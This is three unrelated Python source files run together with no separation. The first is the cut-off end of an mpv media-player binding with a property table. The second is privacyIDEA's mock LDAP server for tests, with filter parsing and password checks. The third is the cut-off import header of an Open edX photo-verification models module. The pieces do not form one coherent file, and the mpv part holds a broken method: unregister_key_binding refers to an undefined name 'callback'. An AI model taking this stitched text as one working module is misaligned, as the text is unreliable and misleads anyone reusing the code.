            raise ValueError('Invalid keydef. Expected format: [Shift+][Ctrl+][Alt+][Meta+]<key>\n'
                    '<key> is either the literal character the key produces (ASCII or Unicode character), or a '
                    'symbolic name (as printed by --input-keylist')
        binding_name = MPV._binding_name(keydef)
        if callable(callback_or_cmd):
            self._key_binding_handlers[binding_name] = callback_or_cmd
            self.register_message_handler('key-binding', self._handle_key_binding_message)
            self.command('define-section',
                    binding_name, '{} script-binding py_event_handler/{}'.format(keydef, binding_name), mode)
        elif isinstance(callback_or_cmd, str):
            self.command('define-section', binding_name, '{} {}'.format(keydef, callback_or_cmd), mode)
        else:
            raise TypeError('register_key_binding expects either an str with an mpv command or a python callable.')
        self.command('enable-section', binding_name)

    def _handle_key_binding_message(self, binding_name, key_state, key_name):
        self._key_binding_handlers[binding_name](key_state, key_name)

    def unregister_key_binding(self, keydef):
        binding_name = MPV._binding_name(keydef)
        self.command('disable-section', binding_name)
        self.command('define-section', binding_name, '')
        if callable(callback):
            del self._key_binding_handlers[binding_name]
            if not self._key_binding_handlers:
                self.unregister_message_handler('key-binding')

    # Convenience functions
    def play(self, filename):
        self.loadfile(filename)

    # Property accessors
    def _get_property(self, name, proptype=str, decode_str=False):
        fmt = {int:         MpvFormat.INT64,
               float:       MpvFormat.DOUBLE,
               bool:        MpvFormat.FLAG,
               str:         MpvFormat.STRING,
               bytes:       MpvFormat.STRING,
               commalist:   MpvFormat.STRING,
               MpvFormat.NODE: MpvFormat.NODE}[proptype]

        out = cast(create_string_buffer(sizeof(c_void_p)), c_void_p)
        outptr = byref(out)
        try:
            cval = _mpv_get_property(self.handle, name.encode('utf-8'), fmt, outptr)
            rv = MpvNode.node_cast_value(outptr, fmt, decode_str or proptype in (str, commalist))

            if proptype is commalist:
                rv = proptype(rv)

            if proptype is str:
                _mpv_free(out)
            elif proptype is MpvFormat.NODE:
                _mpv_free_node_contents(outptr)

            return rv
        except PropertyUnavailableError as ex:
            return None

    def _set_property(self, name, value, proptype=str):
        ename = name.encode('utf-8')
        if type(value) is bytes:
            _mpv_set_property_string(self.handle, ename, value)
        elif type(value) is bool:
            _mpv_set_property_string(self.handle, ename, b'yes' if value else b'no')
        elif proptype in (str, int, float):
            _mpv_set_property_string(self.handle, ename, str(proptype(value)).encode('utf-8'))
        else:
            raise TypeError('Cannot set {} property {} to value of type {}'.format(proptype, name, type(value)))

    # Dict-like option access
    def __getitem__(self, name, file_local=False):
        """ Get an option value """
        prefix = 'file-local-options/' if file_local else 'options/'
        return self._get_property(prefix+name)

    def __setitem__(self, name, value, file_local=False):
        """ Get an option value """
        prefix = 'file-local-options/' if file_local else 'options/'
        return self._set_property(prefix+name, value)

    def __iter__(self):
        return iter(self.options)

    def option_info(self, name):
        return self._get_property('option-info/'+name)

def commalist(propval=''):
    return str(propval).split(',')

node = MpvFormat.NODE

ALL_PROPERTIES = {
        'osd-level':                    (int,    'rw'),
        'osd-scale':                    (float,  'rw'),
        'loop':                         (str,    'rw'),
        'loop-file':                    (str,    'rw'),
        'speed':                        (float,  'rw'),
        'filename':                     (bytes,  'r'),
        'file-size':                    (int,    'r'),
        'path':                         (bytes,  'r'),
        'media-title':                  (bytes,  'r'),
        'stream-pos':                   (int,    'rw'),
        'stream-end':                   (int,    'r'),
        'length':                       (float,  'r'), # deprecated for ages now
        'duration':                     (float,  'r'),
        'avsync':                       (float,  'r'),
        'total-avsync-change':          (float,  'r'),
        'drop-frame-count':             (int,    'r'),
        'percent-pos':                  (float,  'rw'),
#        'ratio-pos':                    (float,  'rw'),
        'time-pos':                     (float,  'rw'),
        'time-start':                   (float,  'r'),
        'time-remaining':               (float,  'r'),
        'playtime-remaining':           (float,  'r'),
        'chapter':                      (int,    'rw'),
        'edition':                      (int,    'rw'),
        'disc-titles':                  (int,    'r'),
        'disc-title':                   (str,    'rw'),
#        'disc-menu-active':             (bool,   'r'),
        'chapters':                     (int,    'r'),
        'editions':                     (int,    'r'),
        'angle':                        (int,    'rw'),
        'pause':                        (bool,   'rw'),
        'core-idle':                    (bool,   'r'),
        'cache':                        (int,    'r'),
        'cache-size':                   (int,    'rw'),
        'cache-free':                   (int,    'r'),
        'cache-used':                   (int,    'r'),
        'cache-speed':                  (int,    'r'),
        'cache-idle':                   (bool,   'r'),
        'cache-buffering-state':        (int,    'r'),
        'paused-for-cache':             (bool,   'r'),
#        'pause-for-cache':              (bool,   'r'),
        'eof-reached':                  (bool,   'r'),
#        'pts-association-mode':         (str,    'rw'),
        'hr-seek':                      (str,    'rw'),
        'volume':                       (float,  'rw'),
        'volume-max':                   (int,    'rw'),
        'ao-volume':                    (float,  'rw'),
        'mute':                         (bool,   'rw'),
        'ao-mute':                      (bool,   'rw'),
        'audio-speed-correction':       (float,  'r'),
        'audio-delay':                  (float,  'rw'),
        'audio-format':                 (str,    'r'),
        'audio-codec':                  (str,    'r'),
        'audio-codec-name':             (str,    'r'),
        'audio-bitrate':                (float,  'r'),
        'packet-audio-bitrate':         (float,  'r'),
        'audio-samplerate':             (int,    'r'),
        'audio-channels':               (str,    'r'),
        'aid':                          (str,    'rw'),
        'audio':                        (str,    'rw'), # alias for aid
        'balance':                      (int,    'rw'),
        'fullscreen':                   (bool,   'rw'),
        'deinterlace':                  (str,    'rw'),
        'colormatrix':                  (str,    'rw'),
        'colormatrix-input-range':      (str,    'rw'),
#        'colormatrix-output-range':     (str,    'rw'),
        'colormatrix-primaries':        (str,    'rw'),
        'ontop':                        (bool,   'rw'),
        'border':                       (bool,   'rw'),
        'framedrop':                    (str,    'rw'),
        'gamma':                        (float,  'rw'),
        'brightness':                   (int,    'rw'),
        'contrast':                     (int,    'rw'),
        'saturation':                   (int,    'rw'),
        'hue':                          (int,    'rw'),
        'hwdec':                        (str,    'rw'),
        'panscan':                      (float,  'rw'),
        'video-format':                 (str,    'r'),
        'video-codec':                  (str,    'r'),
        'video-bitrate':                (float,  'r'),
        'packet-video-bitrate':         (float,  'r'),
        'width':                        (int,    'r'),
        'height':                       (int,    'r'),
        'dwidth':                       (int,    'r'),
        'dheight':                      (int,    'r'),
        'fps':                          (float,  'r'),
        'estimated-vf-fps':             (float,  'r'),
        'window-scale':                 (float,  'rw'),
        'video-aspect':                 (str,    'rw'),
        'osd-width':                    (int,    'r'),
        'osd-height':                   (int,    'r'),
        'osd-par':                      (float,  'r'),
        'vid':                          (str,    'rw'),
        'video':                        (str,    'rw'), # alias for vid
        'video-align-x':                (float,  'rw'),
        'video-align-y':                (float,  'rw'),
        'video-pan-x':                  (float,  'rw'),
        'video-pan-y':                  (float,  'rw'),
        'video-zoom':                   (float,  'rw'),
        'video-unscaled':               (bool,   'w'),
        'video-speed-correction':       (float,  'r'),
        'program':                      (int,    'w'),
        'sid':                          (str,    'rw'),
        'sub':                          (str,    'rw'), # alias for sid
        'secondary-sid':                (str,    'rw'),
        'sub-delay':                    (float,  'rw'),
        'sub-pos':                      (int,    'rw'),
        'sub-visibility':               (bool,   'rw'),
        'sub-forced-only':              (bool,   'rw'),
        'sub-scale':                    (float,  'rw'),
        'sub-bitrate':                  (float,  'r'),
        'packet-sub-bitrate':           (float,  'r'),
#        'ass-use-margins':              (bool,   'rw'),
        'ass-vsfilter-aspect-compat':   (bool,   'rw'),
        'ass-style-override':           (bool,   'rw'),
        'stream-capture':               (str,    'rw'),
        'tv-brightness':                (int,    'rw'),
        'tv-contrast':                  (int,    'rw'),
        'tv-saturation':                (int,    'rw'),
        'tv-hue':                       (int,    'rw'),
        'playlist-pos':                 (int,    'rw'),
        'playlist-pos-1':               (int,    'rw'), # ugh.
        'playlist-count':               (int,    'r'),
#        'quvi-format':                  (str,    'rw'),
        'seekable':                     (bool,   'r'),
        'seeking':                      (bool,   'r'),
        'partially-seekable':           (bool,   'r'),
        'playback-abort':               (bool,   'r'),
        'cursor-autohide':              (str,    'rw'),
        'audio-device':                 (str,    'rw'),
        'current-vo':                   (str,    'r'),
        'current-ao':                   (str,    'r'),
        'audio-out-detected-device':    (str,    'r'),
        'protocol-list':                (str,    'r'),
        'mpv-version':                  (str,    'r'),
        'mpv-configuration':            (str,    'r'),
        'ffmpeg-version':               (str,    'r'),
        'display-sync-active':          (bool,   'r'),
        'stream-open-filename':         (bytes,   'rw'), # Undocumented
        'file-format':                  (commalist,'r'), # Be careful with this one.
        'mistimed-frame-count':         (int,    'r'),
        'vsync-ratio':                  (float,  'r'),
        'vo-drop-frame-count':          (int,    'r'),
        'vo-delayed-frame-count':       (int,    'r'),
        'playback-time':                (float,  'rw'),
        'demuxer-cache-duration':       (float,  'r'),
        'demuxer-cache-time':           (float,  'r'),
        'demuxer-cache-idle':           (bool,   'r'),
        'idle':                         (bool,   'r'),
        'disc-title-list':              (commalist,'r'),
        'field-dominance':              (str,    'rw'),
        'taskbar-progress':             (bool,   'rw'),
        'on-all-workspaces':            (bool,   'rw'),
        'video-output-levels':          (str,    'r'),
        'vo-configured':                (bool,   'r'),
        'hwdec-current':                (str,    'r'),
        'hwdec-interop':                (str,    'r'),
        'estimated-frame-count':        (int,    'r'),
        'estimated-frame-number':       (int,    'r'),
        'sub-use-margins':              (bool,   'rw'),
        'ass-force-margins':            (bool,   'rw'),
        'video-rotate':                 (str,    'rw'),
        'video-stereo-mode':            (str,    'rw'),
        'ab-loop-a':                    (str,    'r'), # What a mess...
        'ab-loop-b':                    (str,    'r'),
        'dvb-channel':                  (str,    'w'),
        'dvb-channel-name':             (str,    'rw'),
        'window-minimized':             (bool,   'r'),
        'display-names':                (commalist, 'r'),
        'display-fps':                  (float,  'r'), # access apparently misdocumented in the manpage
        'estimated-display-fps':        (float,  'r'),
        'vsync-jitter':                 (float,  'r'),
        'video-params':                 (node,   'r', True),
        'video-out-params':             (node,   'r', True),
        'track-list':                   (node,   'r', False),
        'playlist':                     (node,   'r', False),
        'chapter-list':                 (node,   'r', False),
        'vo-performance':               (node,   'r', True),
        'filtered-metadata':            (node,   'r', False),
        'metadata':                     (node,   'r', False),
        'chapter-metadata':             (node,   'r', False),
        'vf-metadata':                  (node,   'r', False),
        'af-metadata':                  (node,   'r', False),
        'edition-list':                 (node,   'r', False),
        'disc-titles':                  (node,   'r', False),
        'audio-params':                 (node,   'r', True),
        'audio-out-params':             (node,   'r', True),
        'audio-device-list':            (node,   'r', True),
        'video-frame-info':             (node,   'r', True),
        'decoder-list':                 (node,   'r', True),
        'encoder-list':                 (node,   'r', True),
        'vf':                           (node,   'r', True),
        'af':                           (node,   'r', True),
        'options':                      (node,   'r', True),
        'file-local-options':           (node,   'r', True),
        'property-list':                (commalist,'r')}

def bindproperty(MPV, name, proptype, access, decode_str=False):
    getter = lambda self: self._get_property(name, proptype, decode_str)
    setter = lambda self, value: self._set_property(name, value, proptype)

    def barf(*args):
        raise NotImplementedError('Access denied')

    setattr(MPV, name.replace('-', '_'), property(getter if 'r' in access else barf, setter if 'w' in access else barf))

for name, (proptype, access, *args) in ALL_PROPERTIES.items():
    bindproperty(MPV, name, proptype, access, *args)


# -*- coding: utf-8 -*-
"""
2020-09-07 Cornelius Kölbel <cornelius.koelbel@netknights.it>
           Add exception
2017-04-26 Friedrich Weber <friedrich.weber@netknights.it>
           Make it possible to check for correct LDAPS/STARTTLS settings
2017-01-08 Cornelius Kölbel <cornelius.koelbel@netknights.it>
           Remove objectGUID. Since we stick with ldap3 version 2.1,
           the objectGUID is returned in a human readable format.
2016-12-05 Martin Wheldon <martin.wheldon@greenhills-it.co.uk>
           Fixed issue creating ldap entries with objectClasses defined
           Fix problem when searching for attribute values containing the
           space character.
2016-05-26 Martin Wheldon <martin.wheldon@greenhills-it.co.uk>
           Rewrite of search functionality to add recursive parsing
           of ldap search filters
           Fixed issue searching for attributes with multiple values
           Added ability to use ~= in searches
           Created unittests for mock
2016-02-19 Cornelius Kölbel <cornelius.koelbel@netknights.it>
           Add the possibility to check objectGUID
2015-01-31 Change responses.py to be able to run with SMTP
        Cornelius Kölbel <cornelius@privacyidea.org>

Original responses.py is:
Copyright 2013 Dropbox, Inc.

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""

from __future__ import (
    absolute_import, division, unicode_literals
)

from passlib.hash import ldap_salted_sha1
from ast import literal_eval
import uuid
from ldap3.utils.conv import escape_bytes
import ldap3
import re
import pyparsing

from .smtpmock import get_wrapped

from collections import namedtuple, Sequence, Sized
from privacyidea.lib.utils import to_bytes, to_unicode

DIRECTORY = "tests/testdata/tmp_directory"

Call = namedtuple('Call', ['request', 'response'])

_wrapper_template = """\
def wrapper%(signature)s:
    with ldap3mock:
        return func%(funcargs)s
"""


def _convert_objectGUID(item):
    item = uuid.UUID("{{{0!s}}}".format(item)).bytes_le
    item = escape_bytes(item)
    return item


class CallList(Sequence, Sized):
    def __init__(self):
        self._calls = []

    def __iter__(self):
        return iter(self._calls)

    def __len__(self):
        return len(self._calls)

    def __getitem__(self, idx):
        return self._calls[idx]

    def setdata(self, request, response):
        self._calls.append(Call(request, response))

    def reset(self):
        self._calls = []


class Connection(object):

    class Extend(object):

        class Standard(object):

            def __init__(self, connection):
                self.connection = connection

            def paged_search(self, **kwargs):
                self.connection.search(search_base=kwargs.get("search_base"),
                                       search_scope=kwargs.get("search_scope"),
                                       search_filter=kwargs.get(
                                           "search_filter"),
                                       attributes=kwargs.get("attributes"),
                                       paged_size=kwargs.get("page_size"),
                                       size_limit=kwargs.get("size_limit"),
                                       paged_cookie=None)
                result = self.connection.response
                if kwargs.get("generator", False):
                    # If ``generator=True`` is passed, ``paged_search`` should return an iterator.
                    result = iter(result)
                return result

        def __init__(self, connection):
            self.standard = self.Standard(connection)

    def __init__(self, directory=None):
        if directory is None:
                directory = []
        import copy
        self.directory = copy.deepcopy(directory)
        self.bound = False
        self.start_tls_called = False
        self.extend = self.Extend(self)

        self.operation = {
                    "!" : self._search_not,
                    "&" : self._search_and,
                    "|" : self._search_or,
            }

    def set_directory(self, directory):
        self.directory = directory

    def _find_user(self, dn):
        return next(i for (i, d) in enumerate(self.directory) if d["dn"] == dn)

    @staticmethod
    def open(read_server_info=True):
        return

    def bind(self, read_server_info=True):
        return self.bound

    def start_tls(self, read_server_info=True):
        self.start_tls_called = True

    def add(self, dn, object_class=None, attributes=None):

        self.result = { 'dn' : '',
                        'referrals' : None,
                        'description' : 'success',
                        'result' : 0,
                        'message' : '',
                        'type' : 'addResponse'}

        # Check to see if the user exists in the directory
        try:
            index = self._find_user(dn)
        except StopIteration:
            # If we get here the user doesn't exist so continue
            # Create a entry object for the new user
            entry = {}
            entry['dn'] = dn
            entry['attributes'] = attributes
            if object_class != None:
                entry['attributes'].update( {'objectClass': object_class} )
        else:
            # User already exists
            self.result["description"] = "failure"
            self.result["result"] = 68
            self.result["message"] = \
                    "Error entryAlreadyExists for {0}".format(dn)
            return False

        # Add the user entry to the directory
        self.directory.append(entry)

        # Attempt to write changes to disk
        with open(DIRECTORY, 'w+') as f:
            f.write(str(self.directory))

        return True

    def delete(self, dn, controls=None):

        self.result = { 'dn' : '',
                        'referrals' : None,
                        'description' : 'success',
                        'result' : 0,
                        'message' : '',
                        'type' : 'addResponse'}

        # Check to see if the user exists in the directory
        try:
            index = self._find_user(dn)
        except StopIteration:
            # If we get here the user doesn't exist so continue
            self.result["description"] = "failure"
            self.result["result"] = 32
            self.result["message"] = "Error no such object: {0}".format(dn)
            return False

        # Delete the entry object for the user
        self.directory.pop(index)

        # Attempt to write changes to disk
        with open(DIRECTORY, 'w+') as f:
            f.write(str(self.directory))

        return True

    def modify(self, dn, changes, controls=None):

        self.result = { 'dn' : '',
                        'referrals' : None,
                        'description' : 'success',
                        'result' : 0,
                        'message' : '',
                        'type' : 'modifyResponse'}

        # Check to see if the user exists in the directory
        try:
            index = self._find_user(dn)
        except StopIteration:
            # If we get here the user doesn't exist so continue
            self.result["description"] = "failure"
            self.result["result"] = 32
            self.result["message"] = "Error no such object: {0!s}".format(dn)
            return False

        # extract the hash we are interested in
        entry = self.directory[index].get("attributes")

        # Loop over the changes hash and apply them
        for k, v in changes.items():
            if v[0] == "MODIFY_DELETE":
                entry.pop(k)
            elif v[0] == "MODIFY_REPLACE" or v[0] == "MODIFY_ADD":
                entry[k] = v[1][0]
            else:
                self.result["result"] = 2
                self.result["message"] = "Error bad/missing/not implemented" \
                    "modify operation: %s" % k[1]

        # Place the attributes back into the directory hash
        self.directory[index]["attributes"] = entry

        # Attempt to write changes to disk
        with open(DIRECTORY, 'w+') as f:
            f.write(str(self.directory))

        return True

    @staticmethod
    def _match_greater_than_or_equal(search_base, attribute, value, candidates):
        matches = list()
        for entry in candidates:
            dn = entry.get("dn")
            if not dn.endswith(search_base):
                continue

            value_from_directory = entry.get("attributes").get(attribute)
            if str(value_from_directory) >= str(value):
                entry["type"] = "searchResEntry"
                matches.append(entry)

        return matches

    @staticmethod
    def _match_greater_than(search_base, attribute, value, candidates):
        matches = list()
        for entry in candidates:
            dn = entry.get("dn")
            if not dn.endswith(search_base):
                continue

            value_from_directory = entry.get("attributes").get(attribute)
            if str(value_from_directory) > str(value):
                entry["type"] = "searchResEntry"
                matches.append(entry)

        return matches

    @staticmethod
    def _match_less_than_or_equal(search_base, attribute, value, candidates):
        matches = list()
        for entry in candidates:
            dn = entry.get("dn")
            if not dn.endswith(search_base):
                continue

            value_from_directory = entry.get("attributes").get(attribute)
            if str(value_from_directory) <= str(value):
                entry["type"] = "searchResEntry"
                matches.append(entry)

        return matches

    @staticmethod
    def _match_less_than(search_base, attribute, value, candidates):
        matches = list()
        for entry in candidates:
            dn = entry.get("dn")
            if not dn.endswith(search_base):
                continue

            value_from_directory = entry.get("attributes").get(attribute)
            if str(value_from_directory) < str(value):
                entry["type"] = "searchResEntry"
                matches.append(entry)

        return matches

    @staticmethod
    def _match_equal_to(search_base, attribute, value, candidates):
        matches = list()
        match_using_regex = False

        if "*" in value:
            match_using_regex = True
            #regex = check_escape(value)
            regex = value.replace('*', '.*')
            regex = "^{0}$".format(regex)

        for entry in candidates:
            dn = to_unicode(entry.get("dn"))

            if attribute not in entry.get("attributes") or not dn.endswith(search_base):
                continue

            values_from_directory = entry.get("attributes").get(attribute)
            if isinstance(values_from_directory, list):
                for item in values_from_directory:
                    if attribute == "objectGUID":
                        item = _convert_objectGUID(item)

                    if match_using_regex:
                        m = re.match(regex, str(item), re.I)
                        if m:
                            entry["type"] = "searchResEntry"
                            matches.append(entry)
                    else:
                        if item == value:
                            entry["type"] = "searchResEntry"
                            matches.append(entry)

            else:
                if attribute == "objectGUID":
                    values_from_directory = _convert_objectGUID(values_from_directory)

                if match_using_regex:
                    m = re.match(regex, str(values_from_directory), re.I)
                    if m:
                        entry["type"] = "searchResEntry"
                        matches.append(entry)
                else:
                    # The value, which we compare is unicode, so we convert
                    # the values_from_directory to unicode rather than str.
                    if isinstance(values_from_directory, bytes):
                        values_from_directory = values_from_directory.decode(
                            "utf-8")
                    elif type(values_from_directory) == int:
                        values_from_directory = u"{0!s}".format(values_from_directory)
                    if value == values_from_directory:
                        entry["type"] = "searchResEntry"
                        matches.append(entry)

        return matches

    @staticmethod
    def _match_notequal_to(search_base, attribute, value, candidates):
        matches = list()
        match_using_regex = False

        if "*" in value:
            match_using_regex = True
            #regex = check_escape(value)
            regex = value.replace('*', '.*')
            regex = "^{0}$".format(regex)

        for entry in candidates:
            found = False
            dn = entry.get("dn")

            if not dn.endswith(search_base):
                continue

            values_from_directory = entry.get("attributes").get(attribute)
            if isinstance(values_from_directory, list):
                for item in values_from_directory:
                    if attribute == "objectGUID":
                        item = _convert_objectGUID(item)

                    if match_using_regex:
                        m = re.match(regex, str(item), re.I)
                        if m:
                            found = True
                    else:
                        if item == value:
                            found = True
                if found is False:
                    entry["type"] = "searchResEntry"
                    matches.append(entry)
            else:
                if attribute == "objectGUID":
                    values_from_directory = _convert_objectGUID(values_from_directory)

                if match_using_regex:
                    m = re.match(regex, str(values_from_directory), re.I)
                    if not m:
                        entry["type"] = "searchResEntry"
                        matches.append(entry)
                else:
                    if str(value) != str(values_from_directory):
                        entry["type"] = "searchResEntry"
                        matches.append(entry)

        return matches

    @staticmethod
    def _parse_filter():
        op = pyparsing.oneOf('! & |')
        lpar  = pyparsing.Literal('(').suppress()
        rpar  = pyparsing.Literal(')').suppress()

        k = pyparsing.Word(pyparsing.alphanums)
        # NOTE: We may need to expand on this list, but as this is not a real
        # LDAP server we should be OK.
        # Value to contain:
        #   numbers, upper/lower case letters, astrisk, at symbol, minus, full
        #   stop, backslash or a space
        v = pyparsing.Word(pyparsing.alphanums + "-*@.\\ äöü")
        rel = pyparsing.oneOf("= ~= >= <=")

        expr = pyparsing.Forward()
        atom = pyparsing.Group(lpar + op + expr + rpar) \
                            | pyparsing.Combine(lpar + k + rel + v + rpar)
        expr << atom + pyparsing.ZeroOrMore( expr )

        return expr

    @staticmethod
    def _deDuplicate(results):
        found = dict()
        deDuped = list()
        for entry in results:
            dn = entry.get("dn")
            if not dn in found:
                found[dn] = 1
                deDuped.append(entry)

        return deDuped

    def _invert_results(self, candidates):
        inverted_candidates = list(self.directory)

        for candidate in candidates:
            try:
                inverted_candidates.remove(candidate)
            except ValueError:
                pass

        return inverted_candidates

    def _search_not(self, base, search_filter, candidates=None):
        # Create empty candidates list as we need to use self.directory for
        # each search
        candidates = list()
        this_filter = list()

        index = 0
        search_filter.remove("!")
        for condition in search_filter:
            if not isinstance(condition, list):
                this_filter.append(condition)
            index +=1

        # Remove this_filter items from search_filter list
        for condition in this_filter:
            search_filter.remove(condition)

        try:
            search_filter = list(search_filter[0])
            for sub_filter in search_filter:
                if not isinstance(sub_filter, list):
                    candidates = self.operation.get(sub_filter)(base,
                                                                search_filter,
                                                                candidates)
                else:
                    candidates = self.operation.get(sub_filter[0])(base,
                                                                   sub_filter,
                                                                   candidates)
        except IndexError:
            pass

        candidates = self._invert_results(candidates)

        for item in this_filter:
            if ">=" in item:
                k, v = item.split(">=")
                candidates = Connection._match_less_than(base, k, v,
                                                            self.directory)
            elif "<=" in item:
                k, v = item.split("<=")
                candidates = Connection._match_greater_than(base, k, v,
                                                         self.directory)
            # Emulate AD functionality, same as "="
            elif "~=" in item:
                k, v = item.split("~=")
                candidates = Connection._match_notequal_to(base, k, v,
                                                         self.directory)
            elif "=" in item:
                k, v = item.split("=")
                candidates = Connection._match_notequal_to(base, k, v,
                                                         self.directory)
        return candidates

    def _search_and(self, base, search_filter, candidates=None):
        # Load the data from the directory, if we aren't passed any
        if candidates == [] or candidates is None:
            candidates = self.directory
        this_filter = list()

        index = 0
        search_filter.remove("&")
        for condition in search_filter:
            if not isinstance(condition, list):
                this_filter.append(condition)
            index +=1

        # Remove this_filter items from search_filter list
        for condition in this_filter:
            search_filter.remove(condition)

        try:
            search_filter = list(search_filter[0])
            for sub_filter in search_filter:
                if not isinstance(sub_filter, list):
                    candidates = self.operation.get(sub_filter)(base,
                                                                search_filter,
                                                                candidates)
                else:
                    candidates = self.operation.get(sub_filter[0])(base,
                                                                   sub_filter,
                                                                   candidates)
        except IndexError:
            pass

        for item in this_filter:
            if ">=" in item:
                k, v = item.split(">=")
                candidates = Connection._match_greater_than_or_equal(base, k, v,
                                                                     candidates)
            elif "<=" in item:
                k, v = item.split("<=")
                candidates = Connection._match_less_than_or_equal(base, k, v,
                                                                  candidates)
            # Emulate AD functionality, same as "="
            elif "~=" in item:
                k, v = item.split("~=")
                candidates = Connection._match_equal_to(base, k, v,
                                                         candidates)
            elif "=" in item:
                k, v = item.split("=")
                candidates = Connection._match_equal_to(base, k, v,
                                                         candidates)
        return candidates

    def _search_or(self, base, search_filter, candidates=None):
        # Create empty candidates list as we need to use self.directory for
        # each search
        candidates = list()
        this_filter = list()

        index = 0
        search_filter.remove("|")
        for condition in search_filter:
            if not isinstance(condition, list):
                this_filter.append(condition)
            index +=1

        # Remove this_filter items from search_filter list
        for condition in this_filter:
            search_filter.remove(condition)

        try:
            search_filter = list(search_filter[0])
            for sub_filter in search_filter:
                if not isinstance(sub_filter, list):
                    candidates += self.operation.get(sub_filter)(base,
                                                                 search_filter,
                                                                 candidates)
                else:
                    candidates += self.operation.get(sub_filter[0])(base,
                                                                    sub_filter,
                                                                    candidates)
        except IndexError:
            pass

        for item in this_filter:
            if ">=" in item:
                k, v = item.split(">=")
                candidates += Connection._match_greater_than_or_equal(base, k, v,
                                                             self.directory)
            elif "<=" in item:
                k, v = item.split("<=")
                candidates += Connection._match_less_than_or_equal(base, k, v,
                                                          self.directory)
            # Emulate AD functionality, same as "="
            elif "~=" in item:
                k, v = item.split("~=")
                candidates += Connection._match_equal_to(base, k, v,
                                                         self.directory)
            elif "=" in item:
                k, v = item.split("=")
                candidates += Connection._match_equal_to(base, k, v,
                                                         self.directory)
        return candidates

    def search(self, search_base=None, search_scope=None,
               search_filter=None, attributes=None, paged_size=5,
               size_limit=0, paged_cookie=None):
        s_filter = list()
        candidates = list()
        self.response = list()
        self.result = dict()

        try:
            if isinstance(search_filter, bytes):
                # We need to convert to unicode otherwise pyparsing will not
                # find the u"ö"
                search_filter = to_unicode(search_filter)
            expr = Connection._parse_filter()
            s_filter = expr.parseString(search_filter).asList()[0]
        except pyparsing.ParseBaseException as exx:
            # Just for debugging purposes
            s = "{!s}".format(exx)

        for item in s_filter:
            if item[0] in self.operation:
                candidates = self.operation.get(item[0])(search_base,
                                                         s_filter)
        self.response = Connection._deDuplicate(candidates)

        return True

    def unbind(self):
        return True


class Ldap3Mock(object):

    def __init__(self):
        self._calls = CallList()
        self._server_mock = None
        self.directory = []
        self.exception = None
        self.reset()

    def reset(self):
        self._calls.reset()

    def setLDAPDirectory(self, directory=None):
        if directory is None:
                self.directory = []
        else:
            try:
                with open(DIRECTORY, 'w+') as f:
                    f.write(str(directory))
                    self.directory = directory
            except OSError as e:
                raise

    def set_exception(self, exc=True):
        self.exception = exc

    def _load_data(self, directory):
        try:
            with open(directory, 'r') as f:
                data = f.read()
                return literal_eval(data)
        except OSError as e:
            raise

    @property
    def calls(self):
        return self._calls

    def __enter__(self):
        self.start()

    def __exit__(self, *args):
        self.stop()
        self.reset()

    def activate(self, func):
        evaldict = {'ldap3mock': self, 'func': func}
        return get_wrapped(func, _wrapper_template, evaldict)

    def _on_Server(self, host, port, use_ssl, connect_timeout, get_info=None,
                   tls=None):
        # mangle request packet

        return "FakeServerObject"

    def _on_Connection(self, server, user, password,
                       auto_bind=None, client_strategy=None,
                       authentication=None, check_names=None,
                       auto_referrals=None, receive_timeout=None):
        """
        We need to create a Connection object with
        methods:
            add()
            modify()
            search()
            unbind()
        and object
            response
        """
        # Raise an exception, if we are told to do so
        if self.exception:
            raise Exception("LDAP request failed")
        # check the password
        correct_password = False
        # Anonymous bind
        # Reload the directory just in case a change has been made to
        # user credentials
        self.directory = self._load_data(DIRECTORY)
        if authentication == ldap3.ANONYMOUS and user == "":
            correct_password = True
        for entry in self.directory:
            if to_unicode(entry.get("dn")) == user:
                pw = entry.get("attributes").get("userPassword")
                # password can be unicode
                if to_bytes(pw) == to_bytes(password):
                    correct_password = True
                elif pw.startswith('{SSHA}'):
                    correct_password = ldap_salted_sha1.verify(password, pw)
                else:
                    correct_password = False
        self.con_obj = Connection(self.directory)
        self.con_obj.bound = correct_password
        return self.con_obj

    def start(self):
        import mock

        def unbound_on_Server(host, port,
                              use_ssl,
                              connect_timeout, *a, **kwargs):
            return self._on_Server(host, port,
                              use_ssl,
                              connect_timeout, *a, **kwargs)
        self._server_mock = mock.MagicMock()
        self._server_mock.side_effect = unbound_on_Server
        self._patcher = mock.patch('ldap3.Server',
                                   self._server_mock)
        self._patcher.start()

        def unbound_on_Connection(server, user,
                                  password,
                                  auto_bind,
                                  client_strategy,
                                  authentication,
                                  check_names,
                                  auto_referrals, *a, **kwargs):
            return self._on_Connection(server, user,
                                       password,
                                       auto_bind,
                                       client_strategy,
                                       authentication,
                                       check_names,
                                       auto_referrals, *a,
                                       **kwargs)

        self._patcher2 = mock.patch('ldap3.Connection',
                                    unbound_on_Connection)
        self._patcher2.start()

    def stop(self):
        self._patcher.stop()
        self._patcher2.stop()
        self._server_mock = None

    def get_server_mock(self):
        return self._server_mock

# expose default mock namespace
mock = _default_mock = Ldap3Mock()
__all__ = []
for __attr in (a for a in dir(_default_mock) if not a.startswith('_')):
    __all__.append(__attr)
    globals()[__attr] = getattr(_default_mock, __attr)

# -*- coding: utf-8 -*-
"""
Models for Student Identity Verification

This is where we put any models relating to establishing the real-life identity
of a student over a period of time. Right now, the only models are the abstract
`PhotoVerification`, and its one concrete implementation
`SoftwareSecurePhotoVerification`. The hope is to keep as much of the
photo verification process as generic as possible.
"""
import functools
import json
import logging
import os.path
import uuid
from datetime import timedelta
from email.utils import formatdate

import requests
import six
from django.conf import settings
from django.contrib.auth.models import User
from django.core.cache import cache
from django.core.files.base import ContentFile
from django.urls import reverse
from django.db import models
from django.dispatch import receiver
from django.utils.functional import cached_property
from django.utils.timezone import now
from django.utils.translation import ugettext_lazy
from model_utils import Choices
from model_utils.models import StatusModel, TimeStampedModel
from opaque_keys.edx.django.models import CourseKeyField

from lms.djangoapps.verify_student.ssencrypt import (
    encrypt_and_encode,
    generate_signed_message,
    random_aes_key,
    rsa_encrypt
)
from openedx.core.djangoapps.signals.signals import LEARNER_NOW_VERIFIED
from openedx.core.storage import get_storage

from .utils import earliest_allowed_verification_date

log = logging.getLogger(__name__)


def generateUUID():  # pylint: disable=invalid-name
    """ Utility function; generates UUIDs """
    return str(uuid.uuid4())


